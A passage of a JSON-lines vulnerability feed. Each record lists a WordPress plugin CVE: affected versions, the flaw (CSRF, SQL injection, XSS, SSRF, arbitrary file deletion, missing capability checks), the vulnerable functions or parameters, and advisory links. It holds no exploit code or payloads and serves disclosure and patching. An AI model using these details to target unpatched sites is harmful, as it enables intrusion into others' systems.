link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/trunk\\\/wd\\\/includes\\\/notices.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/trunk\\\/wd\\\/includes\\\/notices.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183170\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183170\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1314","slug":"custom-twitter-feeds","versionImpact":"2.2.5","description":"The Custom Twitter Feeds \u2013 A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.5. This is due to missing or incorrect nonce validation on the ctf_clear_cache_admin() function. This makes it possible for unauthenticated attackers to reset the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L1014\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L1014\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L833\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L833\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254840\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254840\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-twitter-feeds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-twitter-feeds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d47605-ecb8-42cc-901a-3cf07b946877?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d47605-ecb8-42cc-901a-3cf07b946877?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3863","slug":"post-carousel-slider-for-elementor","versionImpact":"1.6.0","description":"The Post Carousel Slider for Elementor plugin for WordPress is vulnerable to improper authorization due to a missing capability check on the process_wbelps_promo_form() function in all versions up to, and including, 1.6.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the plugin\u2019s support-form handler to send arbitrary emails to the site\u2019s support address.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-carousel-slider-for-elementor\\\/tags\\\/1.5.0\\\/support-page\\\/class-support-page.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-carousel-slider-for-elementor\\\/tags\\\/1.5.0\\\/support-page\\\/class-support-page.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3316424%40post-carousel-slider-for-elementor&new=3316424%40post-carousel-slider-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3316424%40post-carousel-slider-for-elementor&new=3316424%40post-carousel-slider-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-carousel-slider-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-carousel-slider-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b92afdf-51e0-4cf5-9f2b-997b9ff98b23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b92afdf-51e0-4cf5-9f2b-997b9ff98b23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28666","slug":"inpost-gallery","versionImpact":"2.1.4.1","description":"The InPost Gallery WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'imgurl' parameter to the add_inpost_gallery_slide_item action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2736","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation in the 'ajax_edit_contact' function. This makes it possible for authenticated attackers to receive the auto login link via shortcode and then modify the assigned user to the auto login link to elevate verified user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bf472f1-5980-48ee-aa10-aad19b6f2456?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bf472f1-5980-48ee-aa10-aad19b6f2456?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L542\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L99\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1843","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to unauthorized permalink structure update due to a missing capability check on the permalink_setup function in versions up to, and including, 3.3.0. This makes it possible for unauthenticated attackers to change the permalink structure.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db00eb6-3e05-42fa-bb84-2df4bcae3955?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db00eb6-3e05-42fa-bb84-2df4bcae3955?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3023","slug":"wp-easycart","versionImpact":"5.4.10","description":"The WP EasyCart plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in versions up to, and including, 5.4.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level or above permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923668\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923668\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin_table.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c1ddaf-4bf2-4937-b7bf-a09162db043e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c1ddaf-4bf2-4937-b7bf-a09162db043e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0432","slug":"wppdf","versionImpact":"20221130","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_delete_card' function. This makes it possible for unauthenticated attackers to delete the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1158","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyforms_new_page function in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber access or higher, to create pages with arbitrary titles. These pages are published.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/admin-ajax.php?rev=2820257#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/admin-ajax.php?rev=2820257#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2831","slug":"calendar","versionImpact":"1.3.14","description":"The Calendar plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcodes in all versions up to, and including, 1.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0886fa16-4292-4223-af01-9aa1f36490f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0886fa16-4292-4223-af01-9aa1f36490f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4788","slug":"boostify-header-footer-builder","versionImpact":"1.3.3","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_bhf_post function in all versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages or posts with arbitrary content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1090acfc-5b0c-478a-ac71-db54fdaefdf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1090acfc-5b0c-478a-ac71-db54fdaefdf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/admin\\\/class-admin.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/admin\\\/class-admin.php#L280\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6522","slug":"modern-events-calendar-lite","versionImpact":"7.12.1","description":"The Modern Events Calendar plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.12.1 via the 'mec_fes_form' AJAX function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bf8f2f-6ab4-4430-800b-5b97abe7589e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bf8f2f-6ab4-4430-800b-5b97abe7589e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/features\\\/fes.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/features\\\/fes.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mec.webnus.net\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/mec.webnus.net\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6924","slug":"truebooker-appointment-booking","versionImpact":"1.0.2","description":"The TrueBooker WordPress plugin before 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39e79801-6ec7-4579-bc6b-fd7e899733a8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39e79801-6ec7-4579-bc6b-fd7e899733a8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8632","slug":"kb-support","versionImpact":"1.6.6","description":"The KB Support \u2013 WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'kbs_ajax_load_front_end_replies' and 'kbs_ajax_mark_reply_as_read' functions in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to read replies of any ticket, and mark any reply as read.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L342\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L342\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L439\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9383","slug":"woo-parcel-pro","versionImpact":"1.8.4","description":"The Parcel Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-parcel-pro\\\/trunk\\\/admin\\\/class-parcelpro-admin.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-parcel-pro\\\/trunk\\\/admin\\\/class-parcelpro-admin.php#L274\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12574","slug":"svg-shortcode","versionImpact":"1.0.1","description":"The SVG Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13522","slug":"magayo-lottery-results","versionImpact":"2.0.12","description":"The magayo Lottery Results plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.12. This is due to missing or incorrect nonce validation on the 'magayo-lottery-results' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magayo-lottery-results\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magayo-lottery-results\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c5f9c6-3346-43fc-beb3-d0269b5599d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c5f9c6-3346-43fc-beb3-d0269b5599d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13881","slug":"linkmyposts","versionImpact":"1.0","description":"The Link My Posts WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/900fa2c6-0cac-4920-aef2-e8b94248b62e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/900fa2c6-0cac-4920-aef2-e8b94248b62e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5927","slug":"everest-forms","versionImpact":"1.9.4","description":"The Everest Forms (Pro) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_entry_files() function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability requires an admin to trigger the deletion via deletion of a form entry and cannot be carried out by the attacker alone.","refs":"[{\"url\":\"https:\\\/\\\/everestforms.net\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/everestforms.net\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/everest-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/everest-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e3a118f-4321-4579-a986-05ce077dc6b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e3a118f-4321-4579-a986-05ce077dc6b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6387","slug":"wp-get-the-table","versionImpact":"1.5","description":"The WP Get The Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-get-the-table\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-get-the-table\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bd18b7a-6555-4838-821d-fcbe0be34ac4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bd18b7a-6555-4838-821d-fcbe0be34ac4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2735","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gh_form' shortcode in versions up to, and including, 2.7.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only works with legacy contact forms.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/trunk\\\/includes\\\/better-meta-compat.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/trunk\\\/includes\\\/better-meta-compat.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4938206e-2ea4-47ed-a307-87cf67dd74a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4938206e-2ea4-47ed-a307-87cf67dd74a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L51\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/form\\\/form.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/form\\\/form.php#L187\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1807","slug":"stax-addons-for-elementor","versionImpact":"1.4.3","description":"The Elementor Addons, Widgets and Enhancements \u2013 Stax plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on the toggle_widget function. This makes it possible for unauthenticated attackers to enable or disable Elementor widgets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c12094bd-aa23-4f9b-92e1-d1d4284fb2a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c12094bd-aa23-4f9b-92e1-d1d4284fb2a0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
